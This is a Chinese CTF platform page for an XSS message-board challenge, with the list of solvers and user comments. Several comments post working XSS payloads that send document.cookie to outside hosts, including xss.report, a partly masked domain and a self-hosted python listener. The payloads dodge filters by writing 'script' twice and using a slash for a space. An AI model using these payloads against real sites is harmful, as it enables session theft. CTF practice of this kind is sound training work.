留言板1WEB 未解决
分数:
20
金币:
3
题目作者:
harry
一 血:
18256197318
一血奖励:
5金币
解 决:
242
提 示:
需要xss平台接收flag
描 述:
flag{}
评分(4)
解题动态
灵梦归希 攻破了该题 2天前
ljjbit 攻破了该题 7天前
whshkdh 攻破了该题 9天前
tabwux 攻破了该题 10天前
兰小方 攻破了该题 15天前
任务renwu 攻破了该题 16天前
Star666 攻破了该题 24天前
小石 攻破了该题 27天前
风掠 攻破了该题 29天前
15325870583 攻破了该题 29天前
Vluae 攻破了该题 1月前
afeer123 攻破了该题 1月前
hdcc1 攻破了该题 1月前
zrlht 攻破了该题 1月前
wangjing6715 攻破了该题 1月前
18394165790 攻破了该题 1月前
1781****263 攻破了该题 1月前
炖蛋 攻破了该题 1月前
billy856 攻破了该题 1月前
评论
灵梦归希 2天前
举报
注意,这个不能采用XSS平台。因为只是请求url地址而已。但是不会执行js的脚本。几乎xss平台,是会访问js脚本,并执行才会上报的。所以XSS平台收不到是正常的。
灵梦归希 2天前
举报
不用怀疑,这道题目就是有问题的。它是模拟后台发送。并且只发第一条(大概率)。所以第一次收到了,但是不是正式请求(带flag),恭喜你,要删场景重来。警告,这道题就是有问题,前面的错误会影响后面的留言,所以就是个坑
Vluae 1月前
举报
我是phpstudy+Cpolar实现XSS。
我的刀盾 1月前
举报
弄了个ngrok,收不到,http不行说是(~-_-)~
暗流安全 3月前
举报
说点什么吧[img]<scsCRiPtript>location.href="http:/xxxx:8888/?flag_cookie="+document.cookie</scsCRiPtript>[/img] 然后可以用公网运行python3 -m http.server 8888 记得点一下那个图片才会有发送
小白RM 4月前
举报
三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag
kr2yh 5月前
举报
<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以
十里故清云 6月前
举报
在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)
qq1002517 6月前
举报
flag{**********}
网恋秀牛子被录屏导致自卑 8月前
举报
我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替
十里故清云 6月前
举报
用双写绕过和空格了,还是收不到啊...